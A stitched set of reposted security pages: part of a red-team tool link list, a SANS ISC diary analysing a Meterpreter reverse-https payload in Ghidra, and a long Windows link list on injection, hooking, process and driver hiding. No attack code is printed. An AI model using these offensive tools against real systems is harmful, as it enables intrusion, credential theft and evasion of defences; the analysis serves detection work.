of any web service. https://github.com/kgretzky/evilginx mana toolkit for wifi rogue AP attacks and MitM. https://github.com/sensepost/mana Embedded & Peripheral Devices Hacking magspoof a portable device that can spoof/emulate any magnetic stripe, credit card or hotel card "wirelessly", even on standard magstripe (non-NFC/RFID) readers. https://github.com/samyk/magspoof WarBerryPi was built to be used as a hardware implant during red teaming scenarios where we want to obtain as much information as possible in a short period of time with being as stealth as possible. https://github.com/secgroundzero/warberry P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor). https://github.com/mame82/P4wnP1 malusb HID spoofing multi-OS payload for Teensy. https://github.com/ebursztein/malusb Fenrir is a tool designed to be used "out-of-the-box" for penetration tests and offensive engagements. Its main feature and purpose is to bypass wired 802.1x protection and to give you an access to the target network. https://github.com/Orange-Cyberdefense/fenrir-ocd poisontap exploits locked/password protected computers over USB, drops persistent WebSocket-based backdoor, exposes internal router, and siphons cookies using Raspberry Pi Zero & Node.js. https://github.com/samyk/poisontap WHID WiFi HID Injector - An USB Rubberducky / BadUSB On Steroids. https://github.com/whid-injector/WHID Software For Team Communication RocketChat is free, unlimited and open source. Replace email & Slack with the ultimate team chat software solution. https://rocket.chat Etherpad is an open source, web-based collaborative real-time editor, allowing authors to simultaneously edit a text document https://etherpad.net Log Aggregation RedELK Red Team's SIEM - easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations. https://github.com/outflanknl/RedELK/ CobaltSplunk Splunk Dashboard for CobaltStrike logs. https://github.com/vysec/CobaltSplunk Red Team Telemetry A collection of scripts and configurations to enable centralized logging of red team infrastructure. https://github.com/ztgrace/red_team_telemetry Elastic for Red Teaming Repository of resources for configuring a Red Team SIEM using Elastic. https://github.com/SecurityRiskAdvisors/RedTeamSIEM C# Offensive Framework SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers. https://github.com/cobbr/SharpSploit GhostPack is (currently) a collection various C# implementations of previous PowerShell functionality, and includes six separate toolsets being released today- Seatbelt, SharpUp, SharpRoast, SharpDump, SafetyKatz, and SharpWMI. https://github.com/GhostPack SharpWeb .NET 2.0 CLR project to retrieve saved browser credentials from Google Chrome, Mozilla Firefox and Microsoft Internet Explorer/Edge. https://github.com/djhohnstein/SharpWeb reconerator C# Targeted Attack Reconnissance Tools. https://github.com/stufus/reconerator SharpView C# implementation of harmj0y's PowerView. https://github.com/tevora-threat/SharpView Watson is a (.NET 2.0 compliant) C# implementation of Sherlock. https://github.com/rasta-mouse/Watson Labs Detection Lab This lab has been designed with defenders in mind. Its primary purpose is to allow the user to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. https://github.com/clong/DetectionLab Modern Windows Attacks and Defense Lab This is the lab configuration for the Modern Windows Attacks and Defense class that Sean Metcalf (@pyrotek3) and I teach. https://github.com/jaredhaight/WindowsAttackAndDefenseLab Invoke-UserSimulator Simulates common user behaviour on local and remote Windows hosts. https://github.com/ubeeri/Invoke-UserSimulator Invoke-ADLabDeployer Automated deployment of Windows and Active Directory test lab networks. Useful for red and blue teams. https://github.com/outflanknl/Invoke-ADLabDeployer Sheepl Creating realistic user behaviour for supporting tradecraft development within lab environments. https://github.com/SpiderLabs/sheepl Scripts Aggressor Scripts is a scripting language for red team operations and adversary simulations inspired by scriptable IRC clients and bots. https://github.com/invokethreatguy/CSASC https://github.com/secgroundzero/CS-Aggressor-Scripts https://github.com/Und3rf10w/Aggressor-scripts https://github.com/harleyQu1nn/AggressorScripts https://github.com/rasta-mouse/Aggressor-Script https://github.com/RhinoSecurityLabs/Aggressor-Scripts https://github.com/bluscreenofjeff/AggressorScripts https://github.com/001SPARTaN/aggressor_scripts https://github.com/360-A-Team/CobaltStrike-Toolset A collection scripts useful for red teaming and pentesting https://github.com/FuzzySecurity/PowerShell-Suite https://github.com/nettitude/Powershell https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts https://github.com/threatexpress/red-team-scripts https://github.com/SadProcessor/SomeStuff https://github.com/rvrsh3ll/Misc-Powershell-Scripts https://github.com/enigma0x3/Misc-PowerShell-Stuff https://github.com/ChrisTruncer/PenTestScripts https://github.com/bluscreenofjeff/Scripts https://github.com/xorrior/RandomPS-Scripts https://github.com/xorrior/Random-CSharpTools https://github.com/leechristensen/Random https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/social-engineering References MITRE’s ATT&CK™ is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. https://attack.mitre.org/wiki/Main_Page Cheat Sheets for various projects (Beacon/Cobalt Strike,PowerView, PowerUp, Empire, and PowerSploit). https://github.com/HarmJ0y/CheatSheets PRE-ATT&CK Adversarial Tactics, Techniques & Common Knowledge for Left-of-Exploit. https://attack.mitre.org/pre-attack/index.php/Main_Page Adversary OPSEC consists of the use of various technologies or 3rd party services to obfuscate, hide, or blend in with accepted network traffic or system behavior. https://attack.mitre.org/pre-attack/index.php/Adversary_OPSEC Adversary Emulation Plans To showcase the practical use of ATT&CK for offensive operators and defenders, MITRE created Adversary Emulation Plans. https://attack.mitre.org/wiki/Adversary_Emulation_Plans Red-Team-Infrastructure-Wiki Wiki to collect Red Team infrastructure hardening resources. https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki Advanced Threat Tactics – Course and Notes This is a course on red team operations and adversary simulations. https://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes Red Team Tips as posted by @vysecurity on Twitter. https://vincentyiu.co.uk/red-team-tips Awesome Red Teaming List of Awesome Red Team / Red Teaming Resources. https://github.com/yeyintminthuhtut/Awesome-Red-Teaming ATT&CK for Enterprise Software is a generic term for custom or commercial code, operating system utilities, open-source software, or other tools used to conduct behavior modeled in ATT&CK. https://attack.mitre.org/wiki/Software Planning a Red Team exercise This document helps inform red team planning by contrasting against the very specific red team style described in Red Teams. https://github.com/magoo/redteam-plan Awesome Lockpicking a curated list of awesome guides, tools, and other resources related to the security and compromise of locks, safes, and keys. https://github.com/meitar/awesome-lockpicking Awesome Threat Intelligence a curated list of awesome Threat Intelligence resources. https://github.com/hslatman/awesome-threat-intelligence APT Notes Need some scenario? APTnotes is a repository of publicly-available papers and blogs (sorted by year) related to malicious campaigns/activity/software that have been associated with vendor-defined APT (Advanced Persistent Threat) groups and/or tool-sets. https://github.com/aptnotes/data TIBER-EU FRAMEWORK The European Framework for Threat Intelligence-based Ethical Red Teaming (TIBER-EU), which is the first Europe-wide framework for controlled and bespoke tests against cyber attacks in the financial market. http://www.ecb.europa.eu/pub/pdf/other/ecb.tiber_eu_framework.en.pdf CBEST Implementation Guide CBEST is a framework to deliver controlled, bespoke, intelligence-led cyber security tests. The tests replicate behaviours of threat actors, assessed by the UK Government and commercial intelligence providers as posing a genuine threat to systemically important financial institutions. https://www.crest-approved.org/wp-content/uploads/2014/07/CBEST-Implementation-Guide.pdf Red Team: Adversarial Attack Simulation Exercise Guidelines for the Financial Industry in Singapore The Association of Banks in Singapore (ABS), with support from the Monetary Authority of Singapore (MAS), has developed a set of cybersecurity assessment guidelines today to strengthen the cyber resilience of the financial sector in Singapore. Known as the Adversarial Attack Simulation Exercises (AASE) Guidelines or “Red Teaming” Guidelines, the Guidelines provide financial institutions (FIs) with best practices and guidance on planning and conducting Red Teaming exercises to enhance their security testing. https://abs.org.sg/docs/library/abs-red-team-adversarial-attack-simulation-exercises-guidelines-v1-06766a69f299c69658b7dff00006ed795.pdf License Sursa: https://github.com/shr3ddersec/Shr3dKit

Analysing meterpreter payload with Ghidra Yesterday I found a powershell script using urlscan.io which can be found. I didn't (and still don't) have any idea about the origins, being benign or malicious. Spoiler, it is (just) a meterpreter reverse-https payload being delivered using Metasploit's Web Delivery. Urlscan is a great and powerfull tool to analyse webpages. It delivers reports about how the page loads, creates screenshots, stores interesting files and extracts all kind of indicators. Urls can be scanned manually or by the api. There are many automated submissions, like links that have been included in emails or are suspicious. The service helps to find other domains running from the same ip, similar pages and campaigns. Searching for 1.ps1 using urlscan delivers all kind of powershell scripts (many malicious), as also the one I found. Just to add some context, I searched for other occurences of the ip address and file hash delivers, but found just one single result. The powershell contains a base64 encoded payload which will be executed by starting a new powershell session with the script as argument. Using Cyberchef it is easy to decode the base64 payload as can be shown here. Multiple of my dear handler colleagues have written about this useful service already. Cyberchef (runs client side only) makes it easy to create recipes, that will transform the data by just dropping new operations (which are many predefined) to the recipe. This step only base64 decodes the payload, but the next step deflates the payload also. Step 2 contains the encoded reverse-https Meterpreter payload that will be loaded and executed in memory. If we now extract the payload and extract it using another recipe we have the shellcode and we'll load this into Ghidra. Ghidra is the Software Reverse Engineering (SRE) suite of tools which are developed (and now opened) by the NSA. Currently the github repository contains only a placeholder, but it says it will be made available opensource. There has been tweeted a lot about Ghidra and overall reactions are positive. Positive reactions are about the decompiler, the ability for collaborating with colleagues, support for adding multiple binaries to a single project, ability to undo, diffing, many supported processors and the analysis. Negative reactions are that it is based on java, supports no debugging and (steep) learning curve. A more thorough overview can be found in this article of Joxean Koret. Just to highlight a few features of Ghidra, we'll load the binary. After loading the file we have to pick the language, which is x86 32 bits and the binary can be analysed. After importing it will show a small summary about the results. The payload start address (0x0) needs to be disassembled manually, as it doesn't recognise the code. After disassembling the first bytes, the other code will following and you'll get the this screen. The code can be annotated, functions created, diffed etc. Ghidra will show the decompiled function next to the assembly view, a sample of decompilated function (the http request and response part) looks like this. The payload uses a hashed functions to prevent presence of strings within the payload containing the system functions, which makes it less readable. After analyses this is just a default Meterpreter payload where a reverse https shell will be opened to a Meterpreter handler. Meterpreter http(s) handlers will use the default "It works" page we know from Apache, but only a bit different. As the default Apache index.html contains an extra \n (sha256: f2dcc96deec8bca2facba9ad0db55c89f3c4937cd6d2d28e5c4869216ffa81cf and 45 bytes), where meterpreter doesn't (sha256: 8f3ff2e2482468f3b9315a433b383f0cc0f9eb525889a34d4703b7681330a3fb and 44 bytes). If we search the meterpreter hash for Censys we'll find over two thousand suspected meterpreter servers. Maybe something to blacklist? Remco Verhoef (@remco_verhoef) ISC Handler - Founder of DutchSec PGP Key Sursa: https://www.dshield.org/forums/diary/Analysing+meterpreter+payload+with+Ghidra/24722/

awesome-windows-kernel-security-development pe file format https://github.com/corkami/pics meltdown/spectre poc https://github.com/turbo/KPTI-PoC-Collection https://github.com/gkaindl/meltdown-poc https://github.com/feruxmax/meltdown https://github.com/Eugnis/spectre-attack lightweight c++ gui library https://github.com/idea4good/GuiLite https://github.com/golang-ui/nuklear https://github.com/Dovyski/cvui https://github.com/andlabs/libui https://github.com/hasaranga/RFC-Framework https://github.com/dustpg/LongUI https://github.com/bognikol/Eleusis direct ui https://github.com/gclxry/EasyDuilib https://github.com/v-star0719/MFC_LogicalWnd https://github.com/duzhi5368/FKDuiLibEditor https://github.com/wanttobeno/bkuilib https://github.com/wanttobeno/XSkin1.0 https://github.com/idea4good/GuiLite https://github.com/redrains/DuiLib_Redrain https://github.com/wanttobeno/UIDesigner https://github.com/zhongyang219/TrafficMonitor https://github.com/wanttobeno/Duilib_Extension https://github.com/zhongyang219/MusicPlayer2 https://github.com/nmgwddj/duilib_tutorial https://github.com/redrains/DuiLib_Redrain https://github.com/nmgwddj/InstallAssist https://github.com/netease-im/NIM_PC_UIKit https://github.com/nmgwddj/Optimizer https://github.com/nmgwddj/BarPCMaster (netbar) chrome https://github.com/shuax/GreenChrome cef https://github.com/acristoffers/CEF3SimpleSample https://github.com/sanwer/Browser WebBrowser https://github.com/litehtml/litebrowser https://github.com/venam/Browser (lib) https://github.com/wanttobeno/Study_IWebBrowser2 d3d https://github.com/ThirteenAG/d3d9-wrapper lua https://github.com/vinniefalco/LuaBridge c++ & js https://github.com/wargio/WSH-Framework https://github.com/ExpLife0011/WebBrowser https://github.com/wanttobeno/Study_mujs gdi/gdi+ http://www.mctrl.org/ (win32 control lib) https://github.com/wanttobeno/AlphaEditor https://github.com/wanttobeno/FastZoomDemo (zoom) https://github.com/wanttobeno/GdiPlusTextEffect https://github.com/wanttobeno/GdiPlusString https://github.com/wanttobeno/WindowFinder https://github.com/wanttobeno/ymagine https://github.com/wanttobeno/levels-adjustment https://github.com/wanttobeno/ElipsePic https://github.com/wanttobeno/windows-effect https://github.com/wanttobeno/Study_easing_animation https://github.com/wanttobeno/Study_FindPicAlgorithm (find picture algorithm) https://github.com/wanttobeno/Window_GlassIntro_demo computer vision & machine learning https://github.com/wanttobeno/sod compress https://github.com/wanttobeno/snappy Dongle https://github.com/wanttobeno/Dongle spy++ https://github.com/wjx0912/MySpy Shell Extension for Windows Explorer https://github.com/abhimanyusirohi/ThumbFish (nice demo) https://github.com/matssigge/JASE https://github.com/Oeffner/MtzExtInfoTip https://github.com/danielgrigg/ContextMenuDemo https://github.com/monolithpl/stexbar https://github.com/CaSchmidt/csMenu https://github.com/blndev/ExplorerUtilitys https://github.com/pke/Windows-Explorer-OSGi-Shell-Extensions https://github.com/Anton-V-K/MultiThumbExtension https://github.com/0ffffffffh/ffmpegShellExtension https://github.com/Ralph-Lee/WinShellExt https://github.com/slivermeteor/LockKeys https://github.com/alexandermenze/ShellExtensionInfoTip https://github.com/jbrandwood/EditWith https://github.com/calzakk/CyoHash https://github.com/asa75asa/ImageResizer https://github.com/tillig/JunctionShellExtensions https://github.com/keybase/KBShellExt https://github.com/T800G/StatusBar7 https://github.com/vladm3/ShellExtension https://github.com/sop/cygextreg https://github.com/AndreasVerhoeven/HTMLPreviewShellExtension https://github.com/alvinhochun/KritaShellExtension https://github.com/AUTOMATIC1111/3ds-shell https://github.com/google/google-drive-shell-extension https://github.com/TortoiseGit/TortoiseGit https://github.com/sanje2v/MantaPropertyExtension https://github.com/phwitti/cmdhere windows system programming https://github.com/billziss-gh/winspd https://github.com/ffiirree/Capturer https://github.com/Claybird/lhaforge https://github.com/jjzhang166/nargnos-WindowsUtil https://github.com/cool2528/baiduCDP https://github.com/anhkgg/SuperWeChatPC https://github.com/Alex3434/GetHDDSerial https://github.com/TonyChen56/HackerTools https://github.com/libyal/liblnk https://github.com/NtRaiseHardError/Kaiser https://github.com/mengskysama/V8 (chrome v8 engine) https://github.com/locustwei/WorkBack https://github.com/360-A-Team/EventCleaner https://github.com/Microsoft/Windows-classic-samples https://github.com/troldal/OpenXLSX (.xlsx format) https://github.com/mity/windrawlib (GDI+ Helper) https://github.com/henrypp/errorlookup https://github.com/longmode/authzsec-mod-um (AppContainer and ACL) https://github.com/henrypp/memreduct https://github.com/thomaslaurenson/LiveDiff (live diff) https://github.com/thomaslaurenson/CellXML-offreg (hive file parse) https://github.com/zhaolong/libparser (static lib parse) https://github.com/WildByDesign/Privexec https://github.com/KangLin/RabbitIm https://github.com/kingsunc/MiniDump https://github.com/amdf/reparselib https://github.com/Zero3K/connectfusion (download manager) https://github.com/Zero3K/ERAM (RAM Disk) https://github.com/bailey27/cppcryptfs ( gocryptfs encrypted overlay filesystem) https://github.com/etsubu/MacroRecorder (recording keyboard and mouse macros) https://github.com/wyrover/CodeLib https://github.com/Rprop/CppDLL (dll to .h and lib) https://github.com/seledka/syslib https://github.com/leecher1337/regremap https://github.com/webees/ADkiller https://github.com/skysilent/coroutine_study (fiber) https://github.com/ruusty/NAntMenu https://github.com/chrdavis/PIFShellExtensions https://github.com/codepongo/zshellext https://github.com/lz77win/lz77win_sources https://github.com/Microsoft/perfview https://github.com/GameTechDev/PresentMon https://github.com/hfiref0x/BSODScreen https://github.com/CasualX/LibEx https://github.com/syhyz1990/baiduyun https://github.com/WalkingCat/SymDiff https://github.com/libyal/libevtx https://github.com/wanttobeno/Screenshot https://github.com/scarsty/tinypot https://github.com/jonasblunck/DynHook https://github.com/y11en/PEBFake (PEB fake) https://github.com/wanttobeno/mousehook (setwindowhook) https://github.com/wanttobeno/DXF-Viewer https://github.com/wanttobeno/XmlConfigDemo https://github.com/wanttobeno/GeneralHashFunctions https://github.com/wanttobeno/Chrome-base-cpu https://github.com/wanttobeno/stl_util https://github.com/wanttobeno/LinkHelper https://github.com/wanttobeno/Ring3GetProcessInfo https://github.com/zsummer/breeze https://github.com/wanttobeno/SoftWareManager https://github.com/wanttobeno/GetMacAddress https://github.com/wanttobeno/HtmlViewer https://github.com/wanttobeno/AltServer https://github.com/wanttobeno/GetPeInfo https://github.com/wanttobeno/notepad https://github.com/wanttobeno/PELearningMaterials https://github.com/wanttobeno/Detours_4.0.1 https://github.com/wanttobeno/skinsb https://github.com/wanttobeno/DLib-Attacher https://github.com/wanttobeno/VmpHandle https://github.com/wanttobeno/ScopeGuard (resource safe delete) https://github.com/wanttobeno/HashMapDemo https://github.com/wanttobeno/nanob (protobuf) https://github.com/wanttobeno/baidu-sofa-pbrpc-win (protobuf) https://github.com/xlet/UpdateClient https://github.com/wanttobeno/AesFileProtection https://github.com/wanttobeno/IeProxy https://github.com/wanttobeno/MyProtocol https://github.com/wanttobeno/Window_KeyAndMouseHook https://github.com/wanttobeno/doublebufferedqueue (double buffered queue) https://github.com/DoubleLabyrinth/010Editor-keygen (keygen) https://github.com/wanttobeno/Cpp11ThreadPool https://github.com/wanttobeno/Study_shellcode (shellcode) https://github.com/wanttobeno/Study_algorithm (data struct) https://github.com/wanttobeno/ThreadPool https://github.com/wanttobeno/Study_threadpool (thread pool) https://github.com/wanttobeno/Study_Websocket (websocket) https://github.com/Amanieu/asyncplusplus https://github.com/wanttobeno/Study_Socket https://github.com/wanttobeno/DllProtect https://github.com/allenyllee/The-CPUID-Explorer https://github.com/wanttobeno/SunDaySearchSignCode https://github.com/wanttobeno/x64_AOB_Search (fast search memory algorithm) https://github.com/wanttobeno/iQIYI_Web_Video_Upload (http simulate upload) https://github.com/wanttobeno/Study_XiaoMi_Login (https simulate login) https://github.com/fawdlstty/NetToolbox https://github.com/hzqst/FuckCertVerifyTimeValidity https://github.com/717021/PCMgr (task manager) https://github.com/silverf0x/RpcView (rpc) https://github.com/ez8-co/unlocker () https://github.com/nkga/self-updater (framework for secure self-update) https://github.com/liamkirton/sslcat (nc with ssl) https://github.com/Seineruo/RSA-Tool https://github.com/PBfordev/wxAutoExcel https://github.com/ax330d/Symex https://github.com/Biswa96/PDBDownloader https://github.com/Biswa96/TraceEvent https://github.com/hfiref0x/Misc https://github.com/SergioCalderonR/DelSvc https://github.com/wyrover/win-privileges-examples (DACL) https://github.com/nccgroup/WindowsDACLEnumProject (DACL) https://github.com/xqymain/ServerLocker https://github.com/wanttobeno/SunDaySearchSignCode (fast search memory) https://github.com/zhongyang219/SimpleNotePad https://github.com/zhongyang219/TrafficMonitor https://github.com/codereba/data_scrambler (scrambler) https://github.com/3gstudent/Catch-specified-file-s-handle (enum file handle) https://github.com/intel/safestringlib https://github.com/eyusoft/asutlity https://github.com/ThomasThelen/BrowserLib https://github.com/OSRDrivers/dirchange https://github.com/OSRDrivers/deleteex (FileDispositionInfoEx) https://github.com/notscimmy/YASS (sig scanner) https://github.com/942860759/BrowserHistory https://github.com/NoMoreFood/putty-cac https://github.com/NoMoreFood/Repacls https://github.com/NoMoreFood/WinPriv https://github.com/NoMoreFood/Crypture https://github.com/Microsoft/winfile https://github.com/mullvad/windows-libraries https://github.com/wjcsharp/wintools https://github.com/nmgwddj/logs-monitor https://github.com/nmgwddj/TaskbarTool https://github.com/nmgwddj/DevCon https://github.com/nmgwddj/SystemProcessInfo https://github.com/nmgwddj/ServiceMgr wsl/unix https://github.com/Mermeze/wslam (wsl anti malware) https://github.com/Biswa96/WSLInstall https://github.com/Biswa96/WslReverse https://github.com/Biswa96/XConPty https://github.com/mintty/wsltty.appx device tree https://github.com/MartinDrab/VrtuleTree irp monitor https://github.com/MartinDrab/IRPMon nt crucial modules https://github.com/MeeSong/Nt-Crucial-Modules windows kernel driver https://github.com/Mouka-Yang/KernelDriverDemo https://github.com/tomLadder/WinLib https://github.com/coltonon/MoaRpm https://github.com/wanttobeno/ProcessManager_Ring0 https://github.com/wanttobeno/Win_Driver_Mouse_And_Key https://github.com/wanttobeno/Win64DriverStudy_Src https://github.com/tdevuser/MalwFinder https://github.com/Sqdwr/WriteFile_IRP https://github.com/nmgwddj/learn-windows-drivers https://github.com/mq1n/EasyRing0 windows kernel driver with c++ runtime https://github.com/DragonQuestHero/Kernel-Force-Delete (force delete file) https://github.com/MeeSong/WDKExt https://github.com/HoShiMin/Kernel-Bridge (power) https://github.com/wjcsharp/Common https://github.com/ExpLife/DriverSTL https://github.com/sysprogs/BazisLib https://github.com/AmrThabet/winSRDF https://github.com/sidyhe/dxx https://github.com/zer0mem/libc https://github.com/eladraz/XDK https://github.com/vic4key/Cat-Driver https://github.com/AndrewGaspar/km-stl https://github.com/zer0mem/KernelProject https://github.com/zer0mem/miniCommon https://github.com/jackqk/mystudy https://github.com/yogendersolanki91/Kernel-Driver-Example blackbone https://github.com/AbinMM/MemDllLoader_Blackbone https://github.com/hzqst/unicorn_pe https://github.com/nofvcks/AimKit-Pasted-Driver https://github.com/alexpsp00/x-elite-loader https://github.com/DarthTon/Xenos https://github.com/DarthTon/Blackbone hidinput https://github.com/hawku/TabletDriver https://github.com/ViGEm/HidGuardian https://github.com/ecologylab/EcoTUIODriver https://github.com/djpnewton/vmulti https://github.com/duzhi5368/FKHIDKeyboardSimTest (support usb) https://github.com/Jehoash/WinIO3.0 dkom https://github.com/waryas/EUPMAccess https://github.com/notscimmy/pplib https://blog.csdn.net/zhuhuibeishadiao/article/details/51136650 (get process full path name) https://bbs.pediy.com/thread-96427.htm (modify process image name) https://github.com/ZhuHuiBeiShaDiao/PathModification https://github.com/ZhuHuiBeiShaDiao/NewHideDriverEx https://github.com/Sqdwr/HideDriver https://github.com/nbqofficial/HideDriver https://github.com/landhb/HideProcess https://github.com/tfairane/DKOM ssdt hook https://github.com/Sqdwr/64-bits-inserthook https://github.com/int0/ProcessIsolator https://github.com/mrexodia/TitanHide (x64dbg Plugin)-(DragonQuestHero Suggest) https://github.com/papadp/shd https://github.com/bronzeMe/SSDT_Hook_x64 https://github.com/s18leoare/Hackshield-Driver-Bypass https://github.com/sincoder/hidedir https://github.com/wyrover/HKkernelDbg https://github.com/CherryZY/Process_Protect_Module https://github.com/weixu8/RegistryMonitor https://github.com/nmgwddj/Learn-Windows-Drivers eat/iat/object/irp/iat hook https://github.com/hasherezade/IAT_patcher https://github.com/Cyrex1337/hook.lib https://github.com/hMihaiDavid/hooks https://github.com/Scorbutics/IATHook https://github.com/amazadota/AFD-HOOK- https://github.com/wyyqyl/HookIAT https://github.com/smore007/remote-iat-hook https://github.com/m0n0ph1/IAT-Hooking-Revisited https://github.com/xiaomagexiao/GameDll https://github.com/HollyDi/Ring0Hook https://github.com/mgeeky/prc_xchk https://github.com/tinysec/iathook inline hook https://github.com/adrianyy/kernelhook https://github.com/gfreivasc/VMTHook https://github.com/zhipeng515/MemberFunctionHook （member function hook） https://github.com/windy32/win32-console-hook-lib https://github.com/M0rtale/Universal-WndProc-Hook https://github.com/a7031x/HookApi https://github.com/blaquee/APCHook https://github.com/simonberson/ChromeURLSniffer https://github.com/codereversing/sehveh_hook https://github.com/Matviy/LeagueReplayHook https://github.com/jonasblunck/DP https://github.com/XBased/xhook https://github.com/rokups/hooker https://github.com/Ayuto/DynamicHooks https://github.com/sincoder/wow64hook https://github.com/strobejb/sslhook https://github.com/petrgeorgievsky/gtaRenderHook https://github.com/WopsS/RenHook https://github.com/chinatiny/InlineHookLib (R3 & R0) https://github.com/tongzeyu/HookSysenter https://github.com/idkwim/frookSINATRA (x64 sysenter hook) https://github.com/VideoCardGuy/HideProcessInTaskmgr https://github.com/MalwareTech/FstHook https://github.com/Menooker/FishHook https://github.com/G-E-N-E-S-I-S/latebros https://bbs.pediy.com/thread-214582.htm hook engine https://github.com/HoShiMin/HookLib (r3 & r0) https://github.com/Rebzzel/kiero (d3d hook) https://github.com/aschrein/apiparse https://github.com/zyantific/zyan-hook-engine https://github.com/jonasblunck/DP (com hook) https://github.com/jonasblunck/DynHook https://github.com/wanttobeno/ADE32_InlineHook https://github.com/coltonon/RegHookEx (mid function) https://github.com/Synestraa/ArchUltimate.HookLib https://github.com/DominicTobias/detourxs https://github.com/Ilyatk/HookEngine https://github.com/zyantific/zyan-hook-engine https://github.com/martona/mhook https://github.com/EasyHook/EasyHook https://github.com/RelicOfTesla/Detours https://github.com/stevemk14ebr/PolyHook https://github.com/TsudaKageyu/minhook https://github.com/Microsoft/Detours https://github.com/Microwave89/ntapihook anti hook https://github.com/nickcano/ReloadLibrary inject technique (ring0) https://github.com/adrianyy/KeInject https://github.com/Sqdwr/LoadImageInject https://github.com/haidragon/NewInjectDrv https://github.com/alex9191/Kernel-dll-injector (DllInjectFromKernel) https://github.com/wbenny/keinject (ApcInjectFromKernel) inject technique (ring3) https://github.com/Shaxzy/VibranceInjector https://github.com/xiaobo93/UnModule_shellcode_Inject https://github.com/Cybellum/DoubleAgent https://github.com/realoriginal/reflective-rewrite (InjectFromMemory) https://github.com/blaquee/APCHook (apc inject) https://github.com/secrary/InjectProc https://github.com/ez8-co/yapi (Yet Another Process Injector) https://github.com/UserExistsError/InjectDll (InjectFromMemory) https://github.com/notscimmy/libinject https://github.com/BorjaMerino/tlsInjector (tls) https://github.com/BorjaMerino/Pazuzu (InjectFromMemory) https://github.com/strobejb/injdll https://github.com/strivexjun/DriverInjectDll (MapInjectDll) https://github.com/sud0loo/ProcessInjection https://github.com/apriorit/SvcHostDemo https://github.com/can1357/ThePerfectInjector https://github.com/VideoCardGuy/X64Injector https://github.com/papadp/reflective-injection-detection (InjectFromMemory) https://github.com/psmitty7373/eif (InjectFromMemory) https://github.com/rokups/ReflectiveLdr (InjectFromMemory) https://github.com/BenjaminSoelberg/ReflectivePELoader (InjectFromMemory) https://github.com/NtRaiseHardError/Phage (InjectFromMemory) https://github.com/dismantl/ImprovedReflectiveDLLInjection (InjectFromMemory) https://github.com/CylanceVulnResearch/ReflectiveDLLRefresher (InjectFromMemory) https://github.com/amishsecurity/paythepony (InjectFromMemory) https://github.com/deroko/activationcontexthook https://github.com/ez8-co/yapi (Cross x86 & x64 injection) https://github.com/georgenicolaou/HeavenInjector https://github.com/tinysec/runwithdll https://github.com/NtOpcode/NT-APC-Injector https://github.com/caidongyun/WinCodeInjection https://github.com/countercept/doublepulsar-usermode-injector https://github.com/mq1n/DLLThreadInjectionDetector https://github.com/hkhk366/Memory_Codes_Injection https://github.com/chango77747/ShellCodeInjector_MsBuild https://github.com/Zer0Mem0ry/ManualMap https://github.com/secrary/InfectPE https://github.com/zodiacon/DllInjectionWithThreadContext https://github.com/NtOpcode/RtlCreateUserThread-DLL-Injection https://github.com/hasherezade/chimera_loader https://github.com/Ciantic/RemoteThreader https://github.com/OlSut/Kinject-x64 https://github.com/tandasat/RemoteWriteMonitor https://github.com/stormshield/Beholder-Win32 https://github.com/secrary/InjectProc https://github.com/AzureGreen/InjectCollection https://github.com/uItra/Injectora https://github.com/rootm0s/Injectors https://github.com/Spajed/processrefund https://github.com/al-homedawy/InjecTOR https://github.com/OlSut/Kinject-x64 https://github.com/stormshield/Beholder-Win32 https://github.com/yifiHeaven/MagicWall WoW64 <-> x64 https://github.com/wolk-1024/WoW64Utils https://github.com/dadas190/Heavens-Gate-2.0 https://github.com/leecher1337/ntvdmx64 https://github.com/hyzhangzhy/WindowX https://github.com/georgenicolaou/HeavenInjector https://github.com/georgenicolaou/W64oWoW64 https://github.com/Rprop/X86Call https://github.com/rwfpl/rewolf-wow64ext https://github.com/ovidiuvio/libntdbg https://github.com/haidragon/x86tox64 https://github.com/3gstudent/CreateRemoteThread https://github.com/RaMMicHaeL/Textify anti autorun https://github.com/analyst004/autorun anti dll inject https://0cch.com/2015/04/10/e998b2e6ada2global-windows-hookse6b3a8e585a5e79a84e4b880e4b8aae696b9e6b395/ (global hook) https://blog.csdn.net/songjinshi/article/details/7808561 (message hook) https://blog.csdn.net/songjinshi/article/details/7808624 (message hook) https://github.com/mq1n/DLLThreadInjectionDetector https://github.com/analyst004/antinject https://github.com/ExpLife/BotKiller load Dll from memory https://github.com/UserExistsError/DllLoaderShellcode https://github.com/jnastarot/native_peloader https://github.com/fancycode/MemoryModule https://github.com/strivexjun/MemoryModulePP Unpack dll load in runtime https://github.com/1ce0ear/DllLoaderUnpacker dll hijack https://github.com/Cybereason/siofra (identify and exploit) https://github.com/anhkgg/SuperDllHijack https://github.com/strivexjun/AheadLib-x86-x64 https://github.com/zeffy/proxydll_template com hijack https://github.com/enigma0x3/MessageBox anti dll hijack https://github.com/fortiguard-lion/anti-dll-hijacking process hollowing https://github.com/xfgryujk/InjectExe https://github.com/m0n0ph1/Basic-File-Crypter https://github.com/Spajed/processrefund https://github.com/KernelMode/Process_Doppelganging https://github.com/hasherezade/process_doppelganging https://github.com/m0n0ph1/Process-Hollowing https://github.com/KernelMode/RunPE-ProcessHollowing https://github.com/KernelMode/RunPE_Detecter pe loader https://github.com/FrankStain/pe-loader https://github.com/VideoCardGuy/PELoader memory pe dumper https://github.com/glmcdona/Process-Dump dll map detection https://github.com/vmcall/MapDetection dll to shellcode https://github.com/w1nds/dll2shellcode dll to exe https://github.com/hasherezade/dll_to_exe hide process https://github.com/M00nRise/ProcessHider hide & delete dll https://github.com/wyyqyl/HideModule load driver from memory https://github.com/ZhuHuiBeiShaDiao/DriverMaper https://github.com/fadetrack/KernelMemoryModule (Enable Exception) https://github.com/not-wlan/driver-hijack https://github.com/Professor-plum/Reflective-Driver-Loader bypass memory scanner https://github.com/Microwave89/rtsectiontest KeUserModeCallBack https://github.com/Sqdwr/KeUserModeCallBack callback https://github.com/OSRDrivers/kmexts (callbacks) https://github.com/godaddy/procfilter (yara-integrated) https://github.com/McSimp/unfairplay 